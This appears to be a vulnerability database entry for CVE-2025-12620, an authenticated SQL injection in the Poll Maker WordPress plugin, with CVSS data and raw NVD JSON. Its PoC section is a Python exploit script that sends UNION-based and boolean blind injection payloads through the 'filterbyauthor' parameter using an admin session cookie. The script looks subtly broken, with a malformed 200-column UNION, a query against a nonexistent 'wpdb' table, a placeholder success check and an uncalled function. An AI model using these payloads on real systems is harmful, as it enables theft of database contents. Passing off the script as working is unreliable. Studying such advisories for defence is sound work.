Security Vulnerability Report
中文
CVE-2025-12620 CVSS 4.9 MEDIUM

CVE-2025-12620

Published: 2025-11-13 06:16:00
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to generic SQL Injection via the ‘filterbyauthor’ parameter in all versions up to, and including, 6.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Poll Maker WordPress Plugin < 6.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12620 PoC - SQL Injection in Poll Maker WordPress Plugin # Requires Administrator-level access import requests import sys from urllib.parse import quote TARGET_URL = "http://target-wordpress-site.com" COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_user": "your_admin_session_cookie" } def exploit_sql_injection(): """ SQL Injection via filterbyauthor parameter in Poll Maker <= 6.0.7 This PoC demonstrates extracting the WordPress database prefix and user count """ # Target endpoint: WordPress admin admin.php with poll-maker poll list endpoint = f"{TARGET_URL}/wp-admin/admin.php" # Malicious payload to extract database user() and version() # Original query is appended with our injection injection_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,101---" params = { "page": "poll-maker-polls", "filterbyauthor": injection_payload } try: response = requests.get(endpoint, params=params, cookies=COOKIES, timeout=30) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Check response for injected SQL results") print(f"[*] Target URL: {response.url}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def blind_sql_injection(): """ Boolean-based blind SQL injection for data extraction """ # Example: Extract WordPress table prefix target = f"{TARGET_URL}/wp-admin/admin.php" for i in range(1, 20): for ascii_val in range(32, 127): char = chr(ascii_val) payload = f"1' AND ASCII(SUBSTRING((SELECT wpdb.table_name FROM wpdb LIMIT 1),{i},1))={ascii_val}---" params = {"page": "poll-maker-polls", "filterbyauthor": payload} try: resp = requests.get(target, params=params, cookies=COOKIES, timeout=10) # Based on response timing or content differences if resp.status_code == 200 and "expected_result" in resp.text: print(f"Found character {i}: {char}") break except: pass if __name__ == "__main__": print("CVE-2025-12620 SQL Injection PoC") print("Target: WordPress Poll Maker Plugin <= 6.0.7") exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12620", "sourceIdentifier": "[email protected]", "published": "2025-11-13T06:16:00.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to generic SQL Injection via the ‘filterbyauthor’ parameter in all versions up to, and including, 6.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/poll-maker/tags/6.0.7/includes/lists/class-poll-maker-polls-list-table.php#L2033", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/poll-maker/tags/6.0.7/includes/lists/class-poll-maker-polls-list-table.php#L2053", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/56e0efba-4913-4772-8a5b-5cb5c84b5d48?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.